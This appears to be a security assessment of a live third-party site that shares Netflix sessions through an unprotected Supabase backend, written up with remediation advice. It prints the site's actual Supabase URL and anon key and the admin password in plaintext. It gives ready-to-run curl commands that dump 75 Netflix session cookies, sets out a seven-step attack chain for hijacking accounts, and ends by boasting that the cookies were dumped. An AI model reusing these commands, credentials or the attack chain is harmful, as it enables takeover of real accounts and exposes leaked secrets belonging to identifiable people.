Security Assessment: hindisijared.dev

Target Overview

URL: https://hindisijared.dev
Platform: Static portfolio site on Cloudflare Pages hosting a Netflix account sharing tool ("Stream Manager") at /unli-stream
Tech Stack: Vanilla HTML/CSS/JS, Supabase (BaaS), SweetAlert2, Cloudflare CDN with SPA fallback routing
Assessment Date: February 28, 2026

Executive Summary

hindisijared.dev hosts a Netflix session-sharing platform ("Stream Manager") at /unli-stream with a completely unprotected Supabase backend. The Supabase anon key, exposed in a 106KB obfuscated app.js, grants unauthenticated read access to the entire accounts table (75 Netflix accounts with full session cookies) and the admin_config table (including the admin password in plaintext). This represents a total backend compromise achievable by anyone with a web browser.

Critical Findings

1. Supabase Row Level Security (RLS) Bypass — Full Database Read Access

Severity: CRITICAL
CVSS: 9.8

The Supabase backend has no RLS policies on the accounts and admin_config tables. The anon API key (exposed in client-side JavaScript) allows unauthenticated REST API access to read all data.

Extracted Credentials:

Supabase URL: https://rixbfnwxrirmobhrponz.supabase.co
Supabase Anon Key: sb_publishable_6vIO79ajegecCrZ3KTEEcw_H8QbH8iC

Proof of Concept:

# Read all Netflix accounts with full session cookies
curl -s \
  -H "apikey: sb_publishable_6vIO79ajegecCrZ3KTEEcw_H8QbH8iC" \
  -H "Authorization: Bearer sb_publishable_6vIO79ajegecCrZ3KTEEcw_H8QbH8iC" \
  "https://rixbfnwxrirmobhrponz.supabase.co/rest/v1/accounts?select=*"

Response: Returns all 75 accounts (confirmed via Content-Range: 0-74/75) with the following fields per row:

Field	Description	Sensitivity
`id`	Auto-increment ID	Low
`account_email`	Account label (e.g., "account 4")	Medium
`cookie_data`	Full Netflix session cookies as JSON array	CRITICAL
`account_status`	"valid" / etc.	Low
`platform`	"netflix"	Low
`last_used_at`	Timestamp of last access	Medium
`created_at`	Account creation timestamp	Low
`usage_count`	Total access count	Low
`usage_pc`	PC access count	Low
`usage_mobile`	Mobile access count	Low

Exposed Netflix Cookies Include:

NetflixId — Primary session token (full auth cookie with encrypted payload)
SecureNetflixId — Secondary secure session token
nfvdid — Netflix device/visitor ID
profilesNewSession — Session management cookie
OptanonConsent — Consent/geolocation data (reveals user's country: GB;ENG, etc.)

Impact: Any attacker can extract all 75 Netflix session cookies and use them to hijack active Netflix sessions — gaining full access to premium Netflix accounts without credentials.

2. Admin Password Exposed in Plaintext

Severity: CRITICAL
CVSS: 9.1

The admin_config table is fully readable with the anon key and contains the admin password stored in plaintext.

Proof of Concept:

curl -s \
  -H "apikey: sb_publishable_6vIO79ajegecCrZ3KTEEcw_H8QbH8iC" \
  -H "Authorization: Bearer sb_publishable_6vIO79ajegecCrZ3KTEEcw_H8QbH8iC" \
  "https://rixbfnwxrirmobhrponz.supabase.co/rest/v1/admin_config?select=key,value"

Full admin_config dump (8 entries):

Key	Value
`admin_password`	`012629Jared`
`broadcast_active`	`false`
`broadcast_msg`	`Bading si denver`
`system_broadcast`	`{"active": false, "message": "MAINTENANCE KINDLY WAIT "}`
`broadcast_message`	`MAINTENANCE PLEASE WAIT 30MINS TO 1 HOUR, THANK YOU`
`show_ad_banner`	`true`
`maintenance_active`	`false`

Impact:

Admin password 012629Jared can be used to access admin functionality in the Stream Manager app
Password follows pattern 012629 + Jared (likely birth date + name) — high probability of credential reuse across other services
Plaintext password storage violates basic security practices

3. Exposed RPC Function Signatures (Information Disclosure)

Severity: MEDIUM
CVSS: 5.3

PostgREST error messages leak the full parameter signatures of server-side RPC functions:

Function	Parameters	Purpose
`verify_license_v2`	`(p_hwid, p_license_key)`	License key validation with hardware ID binding
`claim_license`	`(p_hardware_id, p_include_account, p_license_key)`	License claiming with account bundling
`admin_import_accounts`	Unknown (exists but params not discoverable)	Bulk account import (admin function)
`searchAccounts`	Referenced in JS but not found via REST	Account search functionality

Impact: Attackers can understand the licensing system's internal logic and craft targeted attacks against the license verification mechanism. The p_hwid/p_hardware_id parameters suggest hardware-based DRM that could be spoofed.

4. Hardcoded Supabase Credentials in Obfuscated Client-Side JavaScript

Severity: HIGH
CVSS: 7.5

The 106KB app.js at the site root uses basic JavaScript obfuscation (string array + base64 decoder rotation) that is trivially reversible. The CONFIG object contains hardcoded Supabase credentials:

CONFIG = {
    supabaseUrl: _0x294aab(0x34a),  // "https://rixbfnwxrirmobhrponz.supabase.co"
    supabaseKey: _0x294aab(0x35b)   // "sb_publishable_6vIO79ajegecCrZ3KTEEcw_H8QbH8iC"
}

Deobfuscation Method:

Extract _0x234a string array function (26KB of base64-encoded strings)
Extract _0x294aab decoder function with _0x1d9a base64 helper
Run through Node.js vm module — all ~500 strings decoded in seconds

Impact: The obfuscation provides zero actual security. Any attacker can extract the Supabase credentials and directly query the backend API.

High Findings

5. Missing Security Headers

Severity: MEDIUM
CVSS: 4.3

Present Headers:

x-content-type-options: nosniff ✓
referrer-policy: strict-origin-when-cross-origin ✓

Missing Headers:

Header	Risk
`Content-Security-Policy`	No CSP — allows XSS, inline script execution, unrestricted resource loading
`X-Frame-Options`	No clickjacking protection — site can be embedded in iframes
`Strict-Transport-Security`	No HSTS on the main domain (present on Supabase)
`Permissions-Policy`	No feature restrictions

6. Overly Permissive CORS

Severity: MEDIUM
CVSS: 4.3

Access-Control-Allow-Origin: *

The wildcard CORS header allows any origin to make authenticated requests to the site, enabling cross-origin data exfiltration.

7. Client-Side Anti-DevTools Bypass

Severity: LOW (Security Theater)
CVSS: 2.0

The inline script disables F12, right-click, Ctrl+U, and Ctrl+Shift+I/C/J. This is trivially bypassed by:

Opening DevTools before loading the page
Using browser extensions
Using curl / Postman directly
Disabling JavaScript temporarily

Database Architecture Summary

Supabase Project: rixbfnwxrirmobhrponz
├── Tables (public schema)
│   ├── accounts        [NO RLS - FULLY READABLE] — 75 rows
│   │   ├── id, account_email, cookie_data (Netflix cookies)
│   │   ├── account_status, platform, usage_count
│   │   └── usage_pc, usage_mobile, last_used_at, created_at
│   ├── admin_config    [NO RLS - FULLY READABLE] — 8 rows
│   │   └── key, value (includes admin_password in plaintext)
│   ├── licenses        [RLS ENABLED - Permission Denied]
│   └── cookie_data     [Does not exist as separate table]
├── RPC Functions
│   ├── verify_license_v2(p_hwid, p_license_key)
│   ├── claim_license(p_hardware_id, p_include_account, p_license_key)
│   └── admin_import_accounts(unknown params)
├── Storage Buckets     [Empty - No buckets found]
└── Realtime
    ├── postgres_changes (accounts, admin_config)
    └── broadcast_active

Access Control Summary:

Resource	READ	WRITE (INSERT/UPDATE/DELETE)
`accounts`	✅ OPEN	❌ Blocked
`admin_config`	✅ OPEN	Not tested destructively
`licenses`	❌ Blocked (RLS)	❌ Blocked
RPC functions	✅ Callable	N/A

Attack Chain

1. Visit https://hindisijared.dev/app.js
2. Deobfuscate JS (trivial — base64 string array)
3. Extract Supabase URL + anon key
4. Query /rest/v1/accounts?select=* → Get all 75 Netflix session cookies
5. Query /rest/v1/admin_config → Get admin password "012629Jared"
6. Import any NetflixId cookie into browser → Full Netflix account access
7. Use admin password to access admin panel functions

Total time from discovery to full exploitation: ~10 minutes

Recommendations

IMMEDIATE: Enable RLS on ALL tables — Add ALTER TABLE accounts ENABLE ROW LEVEL SECURITY; and ALTER TABLE admin_config ENABLE ROW LEVEL SECURITY; with appropriate policies
IMMEDIATE: Rotate all Netflix session cookies — All 75 accounts are compromised and should be considered breached
IMMEDIATE: Change admin password and remove it from the database — use Supabase Auth or a proper hashed credential store
IMMEDIATE: Rotate the Supabase anon key — The current key is publicly known
HIGH: Implement proper authentication — Use Supabase Auth with JWT-based RLS policies; never expose raw table access to anon users
HIGH: Add Content-Security-Policy header — Restrict script sources, disable inline scripts
HIGH: Remove CORS wildcard — Restrict to specific trusted origins
MEDIUM: Move sensitive operations server-side — Use Supabase Edge Functions or a proper API layer instead of direct client-to-database access
LOW: Remove anti-devtools script — It provides no security benefit and wastes bandwidth

75 Netflix Session Cookies | DUMPED